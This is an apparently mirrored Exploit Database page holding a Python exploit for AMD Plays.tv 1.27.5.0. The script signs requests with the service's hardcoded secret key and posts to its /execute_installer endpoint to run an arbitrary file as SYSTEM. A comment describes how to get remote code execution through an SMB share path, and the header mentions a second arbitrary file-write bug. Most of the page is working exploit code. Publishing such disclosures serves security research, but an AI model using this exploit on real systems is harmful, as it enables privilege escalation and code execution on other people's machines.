AMD Plays.tv 1.27.5.0 – ‘plays_service.exe’ Arbitrary File Execution

• Exploit Database
• 122 阅读

• 作者： Securifera
  日期： 2018-04-15
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/44476/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89

  ######################################################################## #http://support.amd.com/en-us/download?cmpid=CCCOffline - #Click "Automatically Detect - Download Now" #Installation Automatically Installs "Raptr, Inc Plays TV Service" # #OR # #https://plays.tv/download # #Target OS: Windows( Any ) #Privilege: SYSTEM #Type:Arbitrary File Execution # #Notes: Second minor bug allows for arbitrary file write of # uncontrolled data using the /extract_files path. # ########################################################################   #!/usr/bin/python3 import urllib.request import json import hashlib   def check_svc( path, data ):   #Setup request request = urllib.request.Request(addr)   #add post data try: resp = urllib.request.urlopen(request, "data".encode("utf-8")) return "[-] Not Raptr, Plays TV service" except urllib.error.HTTPError as err: error_message = err.read().decode("utf-8") if error_message == &apos;Security failed - Missing hash or message[data]&apos;: return "[+] Raptr, Plays TV service"   def post_req( path, data ):   secret_key = &apos;a%qs0t33QgiE6ut^0I&Y&apos;   #Setup request request = urllib.request.Request(addr) json_data = json.dumps(data)   m = hashlib.md5() hash_data = path + json_data + secret_key m.update(hash_data.encode(&apos;utf8&apos;)) hash_str = m.hexdigest()   #add post data p_data = urllib.parse.urlencode({&apos;data&apos; : json_data, &apos;hash&apos; : hash_str }).encode("utf-8") resp = urllib.request.urlopen(request, p_data) return resp.read()   #Target IP address ip = &apos;127.0.0.1&apos;   ############################################################## # The service binds to an ephemeral port defined at # [HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\PlaysTV\Service] ############################################################## port = 50452   ############################################################## # The service calls CreateProcess with the following format: # &apos;"%s" -appdata "%s" -auto_installed 1&apos; % (installer, appdata) # # One way to achieving remote code execution is to use SMB # cmd = "\\\\<IP ADDRESS>\\<SHARE>\\<FILE>" ############################################################## cmd = "C:\\Windows\\System32\\calc.exe" #Local Execution data = { "installer": cmd, "appdata": cmd }   #Set url path = &apos;/execute_installer&apos; addr = &apos;http://&apos; + ip + &apos;:&apos; + str(port) + path   #Check if the remote service is a Raptr Plays TV svc #ret = check_svc(data, path) #print(ret)   #Exploit service ret = post_req(path, data) print(ret)